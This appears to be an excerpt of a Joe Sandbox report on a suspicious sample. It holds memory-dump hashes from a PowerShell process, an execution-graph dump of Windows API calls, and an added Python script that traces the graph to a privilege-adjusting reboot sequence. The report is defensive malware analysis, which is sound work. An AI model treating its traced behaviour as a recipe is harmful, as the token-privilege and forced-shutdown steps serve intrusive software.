                                                                                                                                              • Opcode Fuzzy Hash: 155d55a7a12d93a8919b839481e52ca8c44695cc7950cb8e35f15ae26aea4fa4
                                                                                                                                              • Instruction Fuzzy Hash: 4C318174A012099FEB08DFB9D4947AEBBF6EF88300F149529D501E7350EBB4AC45CB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c4a305b78a61ae4dccb9383e664cf7647f6879e6eb55dca1c1ca7c28319af497
                                                                                                                                              • Instruction ID: 1dca6fc965816ea9a8724a0506d4a457da3841a3e97f6bd43f376b9c1623b8a2
                                                                                                                                              • Opcode Fuzzy Hash: c4a305b78a61ae4dccb9383e664cf7647f6879e6eb55dca1c1ca7c28319af497
                                                                                                                                              • Instruction Fuzzy Hash: 5A317F74A012099FEB08DFA9D5947AEBBF6EF88300F109529D501E7350EBB4AC018B51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6ca8da7c48b2076df29517abde2383c39c8b14db7360b2f14c5197affe09b1f9
                                                                                                                                              • Instruction ID: 50fd0e6f9514229a59a7710381e44323e1bcd1af6152bd39e4318d7bb9dd2a99
                                                                                                                                              • Opcode Fuzzy Hash: 6ca8da7c48b2076df29517abde2383c39c8b14db7360b2f14c5197affe09b1f9
                                                                                                                                              • Instruction Fuzzy Hash: E5317C74A00605DFDB14DFB9D594AEEBBF2FF88200F148A29D416A7390DB74AD05CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ec037d87bb997e271ec6213c13f1b32a00979d56a7c152b2a46a8a28e61fe69a
                                                                                                                                              • Instruction ID: b1993d634dcdfefd04b31d7bca5a3b922d92001b08c34205a479da0a2655848b
                                                                                                                                              • Opcode Fuzzy Hash: ec037d87bb997e271ec6213c13f1b32a00979d56a7c152b2a46a8a28e61fe69a
                                                                                                                                              • Instruction Fuzzy Hash: 5C219275A042088FDB14DFAED84479EBBF5EB89320F14846ED518E7340CA75A905CBA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b5ad28c6e0900e325edd4cfe7d146ed94d75c645086742bba83ca614b7856be
                                                                                                                                              • Instruction ID: 59608cd27b69ac4dd9fd8d2d766ad2a1327c9df75ff17e56d09b231bfd341a26
                                                                                                                                              • Opcode Fuzzy Hash: 5b5ad28c6e0900e325edd4cfe7d146ed94d75c645086742bba83ca614b7856be
                                                                                                                                              • Instruction Fuzzy Hash: BC3188B4E002049FF704EBA8D854BBE7BB2EF84300F114469D611AB395DB75AD01CF60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.2017731974.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_7250000_powershell.jbxd
                                                                                                                                              • Instruction Fuzzy Hash: B401F7315043009FE7204E1ADD84B66BB88DF41220F08C81AED484B392D279B441CEB2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1985984278.000000000471D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0471D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_471d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cb9db127924740f9023a705b67a13434a530c1f54224c6edbc0c861b7f8c1555
                                                                                                                                              • Instruction ID: e645cb2c2a0c90c7adf028eb6d9fc1a6d6ee4a7777d86cf2b0ffe0d80a268444
                                                                                                                                              • Opcode Fuzzy Hash: cb9db127924740f9023a705b67a13434a530c1f54224c6edbc0c861b7f8c1555
                                                                                                                                              • Instruction Fuzzy Hash: 5001257140E7C05FD7128B259D94B52BFB4DF43224F19C5DBD9888F2A3C2699849CB72
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e85cc5865ae8cf324bca2eda54d1a01df76579e36bf3eecc3d55e6f111459d8b
                                                                                                                                              • Instruction ID: 0716aa23c32b353d42ad74e46839731d2ee80f3f72ad5e57fb26a5ec00d558d2
                                                                                                                                              • Opcode Fuzzy Hash: e85cc5865ae8cf324bca2eda54d1a01df76579e36bf3eecc3d55e6f111459d8b
                                                                                                                                              • Instruction Fuzzy Hash: 05F0F6767082A05FD7008A799C54AB7BFE9EFC9621B08447EF544C7351C9B0CC00C760
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e22ecb0c4aa3d9da5564b9b338a36c105d232f39ffc02919433e9c10351bc870
                                                                                                                                              • Instruction ID: 5ca855a8a7f17b140ae4bd43d6bbd7b607f4f98ec44180ac4a13593db7c0c897
                                                                                                                                              • Opcode Fuzzy Hash: e22ecb0c4aa3d9da5564b9b338a36c105d232f39ffc02919433e9c10351bc870
                                                                                                                                              • Instruction Fuzzy Hash: FCF0BE363083645FD7108AAAAC449BBBFEDEBC9620B04457AF954C3351CAB1CC0086A0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1985984278.000000000471D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0471D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_471d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f32ff75ffaf58097443b09f6c81be743740004e106dcd335846c01c5ef0a90f8
                                                                                                                                              • Instruction ID: cc853716ef30fa96ad7e3cfa71ac6bec8f5f8ab73c75ebdf6b3ba223add6bef9
                                                                                                                                              • Opcode Fuzzy Hash: f32ff75ffaf58097443b09f6c81be743740004e106dcd335846c01c5ef0a90f8
                                                                                                                                              • Instruction Fuzzy Hash: 48F0F976200600AF97208F0AD985C23FBA9EBD4770715C55AE84A5B712C671FC41CEA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c6e1098c4e203a26467ff0ccff18f7680b175b8a92c946191e7dab1da2990653
                                                                                                                                              • Instruction ID: bb55132d27ddb4b734a31dc01ea244a7e4d78f8779f505291c260530c6652353
                                                                                                                                              • Opcode Fuzzy Hash: c6e1098c4e203a26467ff0ccff18f7680b175b8a92c946191e7dab1da2990653
                                                                                                                                              • Instruction Fuzzy Hash: 67F0A0363401108FE7009F1CD888E6ABBE6EFCA32172905AAE445DB721CAA5DC028B50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e37e986612265ab56a5203c95c8413dd193d8bacc58c849b95d0004bd88529c2
                                                                                                                                              • Instruction ID: ddac966e512696bfed3f2de174b69a27a2df621cb22c3589b8f8a7778d77cfec
                                                                                                                                              • Opcode Fuzzy Hash: e37e986612265ab56a5203c95c8413dd193d8bacc58c849b95d0004bd88529c2
                                                                                                                                              • Instruction Fuzzy Hash: EDF024B46082404FF710AB6CE4487AF7BA2EFC5329F10825DC90587391CEB9384ACBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1985984278.000000000471D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0471D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_471d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f8d10d7476ebeb97f892e567bd9402c23215de22d3b17c5ff6273cdedb75b7fe
                                                                                                                                              • Instruction ID: d3ed2421bf74c55b9451ea40d0ce84a3ef4a6775d2ffa7e4280ba53ff59a2a0e
                                                                                                                                              • Opcode Fuzzy Hash: f8d10d7476ebeb97f892e567bd9402c23215de22d3b17c5ff6273cdedb75b7fe
                                                                                                                                              • Instruction Fuzzy Hash: C5F0F976104A40AFD725CF06C985D23BBBAEBC5764B198499E85A5B722C671FC02CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b4a6a31908a521c42d07c83bfaf0eed9a3337f42a6a1b0c6ab6cd92b898a2957
                                                                                                                                              • Instruction ID: e96f9f6f0ba48b5a565ba374ce5b40de69eda6b9a6e014149929c22ad60c9c9a
                                                                                                                                              • Opcode Fuzzy Hash: b4a6a31908a521c42d07c83bfaf0eed9a3337f42a6a1b0c6ab6cd92b898a2957
                                                                                                                                              • Instruction Fuzzy Hash: D1F027B57046044BF714BB6CD0087AF7BA6EFC4729F108129C90547385CE793806C7E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8147b63e6716c2629090ec4baceba86517bd80dc08912d3822a9008cb0b89834
                                                                                                                                              • Instruction ID: de592375707826e1d5560c262e89779682fccc8474f6b403dbd923560a691dca
                                                                                                                                              • Opcode Fuzzy Hash: 8147b63e6716c2629090ec4baceba86517bd80dc08912d3822a9008cb0b89834
                                                                                                                                              • Instruction Fuzzy Hash: A3E09A353002118F93009F1DD888C26B7FAEFCE62232904AAE549CB731CAA1EC018B90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d6c3fb46caf6007d6437192208605967f5d331331864b124033ad3c51730feb8
                                                                                                                                              • Instruction ID: dce453234b8987603fdb26a5a608df85d21ecee104a51143e3cef7be708c4d28
                                                                                                                                              • Opcode Fuzzy Hash: d6c3fb46caf6007d6437192208605967f5d331331864b124033ad3c51730feb8
                                                                                                                                              • Instruction Fuzzy Hash: 7CF082B06443045FD360DFB8D8D879B7BE4EB40314F004429E64EC7282DB396881CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d630cc27d65a82d584cc55c17f4e728878dc46b3f2ab941217fe46f2bf6d6b11
                                                                                                                                              • Instruction ID: e9441a2bc1d2c77ea181eaeb7e931ff11a38c4b3277224fdc975fa5d2add9bfb
                                                                                                                                              • Opcode Fuzzy Hash: d630cc27d65a82d584cc55c17f4e728878dc46b3f2ab941217fe46f2bf6d6b11
                                                                                                                                              • Instruction Fuzzy Hash: BEF0B735A001059FDB15CB99D990AEEF7B1FF88324F208559E515A72A1C736A862CB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2bf5ba324c038bd225ccf1514f033ca5fcc9c3e994e8f266125a83e508677dd9
                                                                                                                                              • Instruction ID: 60612748b76c1c161e83266c60fe3690e290187726f50662924d8d95429c7b32
                                                                                                                                              • Opcode Fuzzy Hash: 2bf5ba324c038bd225ccf1514f033ca5fcc9c3e994e8f266125a83e508677dd9
                                                                                                                                              • Instruction Fuzzy Hash: 94F0BD79A51118DFCB00CB98EA94D9CFBB2FF88324B258544E909A7312CB35ED11CF40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 49d4fb7c6b017175700422e027bae15adeb17adcc12c60c2bda2a278bc20fac2
                                                                                                                                              • Instruction ID: a6e412a5ff61427980baa70b7a0308915fe127440758a25e67b25a401ec3d4bd
                                                                                                                                              • Opcode Fuzzy Hash: 49d4fb7c6b017175700422e027bae15adeb17adcc12c60c2bda2a278bc20fac2
                                                                                                                                              • Instruction Fuzzy Hash: EED0A93000E3C44FC3036B78A8508403FB65E4B60034600EFE0898F6B3CA288884CB21
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: efd8b52f263bd0b79b9159f8e3ccee85c62f36400fca8a2af23dd56063560ee9
                                                                                                                                              • Instruction ID: 50174a8913ffdc3178e2ef5f025d962c01dd53692df617725e6b3d5a1de7f790
                                                                                                                                              • Opcode Fuzzy Hash: efd8b52f263bd0b79b9159f8e3ccee85c62f36400fca8a2af23dd56063560ee9
                                                                                                                                              • Instruction Fuzzy Hash: EFD01778B083098F8704EFA4EA4A86EBFB5EB44200F004169EA0A93350EA306852CBC1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5d1d48b80de235a3255ec7ce6d6d1ae81cf694a87cd26b460c8f5984485f27d7
                                                                                                                                              • Instruction ID: a80bf83d2c0895e7bf517313d78af422364fd7477e1587469d6f75a9f8efa0a0
                                                                                                                                              • Opcode Fuzzy Hash: 5d1d48b80de235a3255ec7ce6d6d1ae81cf694a87cd26b460c8f5984485f27d7
                                                                                                                                              • Instruction Fuzzy Hash: 30D01778A4410DDBCB08BBA4FA1A4BDBB34FB00301F4011ADE91792192EE242A5ACAD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 16c0c3e7a22e868e30d32ea08932b7d8dd3bbbd07ff4c3eed243029032369902
                                                                                                                                              • Instruction ID: 5987b6d54930d0cae816783b4ceba15de3806ce5643eb43fddefa810eb5a8ced
                                                                                                                                              • Opcode Fuzzy Hash: 16c0c3e7a22e868e30d32ea08932b7d8dd3bbbd07ff4c3eed243029032369902
                                                                                                                                              • Instruction Fuzzy Hash: E6D09239B40218CFDB04CBA8E994ADCB371FF88365F208569E6159B251CB32ED22CB40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 15c011b134c87fc5980b0a095d7f9cd246baa4d2831d54acbf9031f223c696fd
                                                                                                                                              • Instruction ID: e7ae56bb1ae64ebb493affb1f94f1cfdbd3d3ea56a854b9f03a0fbe95db93fb5
                                                                                                                                              • Opcode Fuzzy Hash: 15c011b134c87fc5980b0a095d7f9cd246baa4d2831d54acbf9031f223c696fd
                                                                                                                                              • Instruction Fuzzy Hash: 64C04C1160A3C15FDF1357358DD4EC63FB35E8362130A45D29062CF823CA28984AD311
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e0db95d4736dc09f1fd7e09bfea9cd2d284d644be0aa68d922399d1221a23b50
                                                                                                                                              • Instruction ID: 389d400912d1c27ec3fa732283e94f38e89e2085df141e59a6769e68b2633d81
                                                                                                                                              • Opcode Fuzzy Hash: e0db95d4736dc09f1fd7e09bfea9cd2d284d644be0aa68d922399d1221a23b50
                                                                                                                                              • Instruction Fuzzy Hash: 9EB09234084B088FC248AFB9B40882877A9AA4860538104ADE50A0A2928F36E880CE64

Execution Graph

Execution Coverage: 16.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1380
Total number of Limit Nodes: 23
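The execution_graph dump that follows is one flat token stream and is hard to read by eye. The Python below is an added worked example, not part of the Joe Sandbox report and not code from the analysed sample: it parses the token stream as it appears on this page, then walks a verbatim excerpt of the dump around node 3623 to recover the shortest call path to the block that calls ExitWindowsEx, together with every API reachable beneath that node (which is where GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW and AdjustTokenPrivileges appear, the usual enable-a-privilege-then-reboot sequence behind a "shutdown / reboot the system" finding such as the one in the overview). My reading of the format is an assumption rather than documented Joe Sandbox syntax: a node is an id followed by a six-hex-digit address and optional API labels, an edge is `src->dst`, and a label run of the form `N API calls` abbreviates a callee whose body is expanded once elsewhere in the graph; the example resolves those abbreviations by address.

```python
import re
from collections import deque
from dataclasses import dataclass, field

# Constructed input: tokens copied from the execution_graph dump of this report, limited to the
# blocks around node 3623 and the expansion of function 406a96 at node 3298; edges were regrouped
# and re-wrapped, otherwise only whitespace differs from the report text.
GRAPH_EXCERPT = """
3623 4039bd 3626 403bb0 ExitProcess CoUninitialize 3623->3626
3629 403be6 3626->3629 3634 403c6a ExitProcess 3629->3634
3635 403bee GetCurrentProcess OpenProcessToken 3629->3635
3639 403c06 LookupPrivilegeValueW AdjustTokenPrivileges 3635->3639
3640 403c3a 3635->3640 3639->3640
3642 406a96 5 API calls 3640->3642 3653 403c41 3642->3653
3647 403c56 ExitWindowsEx 3647->3634 3650 403c63 3647->3650 3653->3647 3653->3650
3298 406a96 GetModuleHandleA 3299 406ab2 3298->3299
3300 406abc GetProcAddress 3298->3300 3320 406a26 GetSystemDirectoryW 3299->3320
3303 406acb 3300->3303 3302 406ab8 3302->3300 3302->3303
3321 406a48 wsprintfW LoadLibraryExW 3320->3321 3321->3302
"""

# Token shapes as read off the dump (an assumption, not documented Joe Sandbox syntax): node =
# "<id> <6 hex digits> [labels...]", edge = "<id>-><id>", "N API calls" = abbreviated callee.
ADDR = re.compile(r"[0-9a-f]{6}")
EDGE = re.compile(r"(\d+)->(\d+)")
CALL_SUMMARY = re.compile(r"(\d+) API calls")

@dataclass
class Node:
    addr: str
    apis: list = field(default_factory=list)  # APIs called directly in this block
    calls: int = 0                             # N from an "N API calls" summary label

def parse_execution_graph(text):
    """Return ({node_id: Node}, [(src, dst), ...]) from the whitespace-separated dump."""
    tok, nodes, edges, i = text.split(), {}, [], 0
    def starts_node(j):
        return tok[j].isdigit() and j + 1 < len(tok) and ADDR.fullmatch(tok[j + 1]) is not None
    while i < len(tok):
        if m := EDGE.fullmatch(tok[i]):
            edges.append((int(m[1]), int(m[2])))
            i += 1
        elif starts_node(i):
            nid, node, i, labels = int(tok[i]), Node(tok[i + 1]), i + 2, []
            while i < len(tok) and not starts_node(i) and not EDGE.fullmatch(tok[i]):
                labels.append(tok[i])
                i += 1
            if m := CALL_SUMMARY.fullmatch(" ".join(labels)):
                node.calls = int(m[1])
            else:
                node.apis = labels
            nodes[nid] = node
        else:
            i += 1  # stray header word such as "execution_graph"
    return nodes, edges

def successors(nodes, edges, expand_summaries=True):
    """Adjacency map; optionally link each summary node to the expanded node at the same address."""
    adj = {}
    for src, dst in edges:
        adj.setdefault(src, []).append(dst)
    if expand_summaries:
        expanded = {n.addr: nid for nid, n in nodes.items() if not n.calls}
        for nid, n in nodes.items():
            if n.calls and n.addr in expanded:
                adj.setdefault(nid, []).append(expanded[n.addr])
    return adj

def find_path(nodes, edges, start, api):
    """Shortest call path (BFS) from start to the first node that calls api, or None."""
    adj, prev, queue = successors(nodes, edges), {start: None}, deque([start])
    while queue:
        cur = queue.popleft()
        if cur in nodes and api in nodes[cur].apis:
            path = []
            while cur is not None:
                path.append(cur)
                cur = prev[cur]
            return path[::-1]
        for nxt in adj.get(cur, []):
            if nxt not in prev:
                prev[nxt] = cur
                queue.append(nxt)
    return None

def apis_reachable(nodes, edges, start, expand_summaries=True):
    """Every API named anywhere in the call tree below start."""
    adj, seen, stack, apis = successors(nodes, edges, expand_summaries), set(), [start], set()
    while stack:
        cur = stack.pop()
        if cur not in seen:
            seen.add(cur)
            apis.update(nodes[cur].apis if cur in nodes else ())
            stack.extend(adj.get(cur, ()))
    return apis

NODES, EDGES = parse_execution_graph(GRAPH_EXCERPT)
if __name__ == "__main__":  # stand-alone run: path to the reboot call, then everything under 3623
    print(find_path(NODES, EDGES, 3623, "ExitWindowsEx"), sorted(apis_reachable(NODES, EDGES, 3623)))
```

In the excerpt, node 3642 is abbreviated as `406a96 5 API calls`, and the expansion of 406a96 at node 3298 reaches exactly five distinct APIs (GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, wsprintfW, LoadLibraryExW), which is why `apis_reachable` follows the address link by default; pass `expand_summaries=False` to see only the APIs the abbreviated node names directly. Paste the whole execution_graph line in place of the excerpt to run the same queries over the complete graph, for example to list every node that reaches CreateProcessW or AdjustTokenPrivileges.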
                                                                                                                                              execution_graph 3249 401bc0 3250 401c11 3249->3250 3251 401bcd 3249->3251 3252 401c16 3250->3252 3253 401c3b GlobalAlloc 3250->3253 3254 4023af 3251->3254 3259 401be4 3251->3259 3262 401c56 3252->3262 3268 4066a2 lstrcpynW 3252->3268 3269 4066df 3253->3269 3256 4066df 21 API calls 3254->3256 3258 4023bc 3256->3258 3288 405d02 3258->3288 3286 4066a2 lstrcpynW 3259->3286 3260 401c28 GlobalFree 3260->3262 3264 401bf3 3287 4066a2 lstrcpynW 3264->3287 3266 401c02 3292 4066a2 lstrcpynW 3266->3292 3268->3260 3270 4066ea 3269->3270 3271 406931 3270->3271 3274 406902 lstrlenW 3270->3274 3277 4067fb GetSystemDirectoryW 3270->3277 3278 4066df 15 API calls 3270->3278 3280 406811 GetWindowsDirectoryW 3270->3280 3281 4066df 15 API calls 3270->3281 3282 4068a3 lstrcatW 3270->3282 3285 406873 SHGetPathFromIDListW CoTaskMemFree 3270->3285 3293 406570 3270->3293 3298 406a96 GetModuleHandleA 3270->3298 3304 406950 3270->3304 3313 4065e9 wsprintfW 3270->3313 3314 4066a2 lstrcpynW 3270->3314 3272 40694a 3271->3272 3315 4066a2 lstrcpynW 3271->3315 3272->3262 3274->3270 3277->3270 3278->3274 3280->3270 3281->3270 3282->3270 3285->3270 3286->3264 3287->3266 3289 405d17 3288->3289 3290 405d63 3289->3290 3291 405d2b MessageBoxIndirectW 3289->3291 3290->3262 3291->3290 3292->3262 3316 40650f 3293->3316 3296 4065a4 RegQueryValueExW RegCloseKey 3297 4065d4 3296->3297 3297->3270 3299 406ab2 3298->3299 3300 406abc GetProcAddress 3298->3300 3320 406a26 GetSystemDirectoryW 3299->3320 3303 406acb 3300->3303 3302 406ab8 3302->3300 3302->3303 3303->3270 3311 40695d 3304->3311 3305 4069d3 3306 4069d8 CharPrevW 3305->3306 3309 4069f9 3305->3309 3306->3305 3307 4069c6 CharNextW 3307->3305 3307->3311 3309->3270 3310 4069b2 CharNextW 3310->3311 3311->3305 3311->3307 3311->3310 3312 4069c1 CharNextW 3311->3312 3323 405f9e 3311->3323 3312->3307 3313->3270 3314->3270 
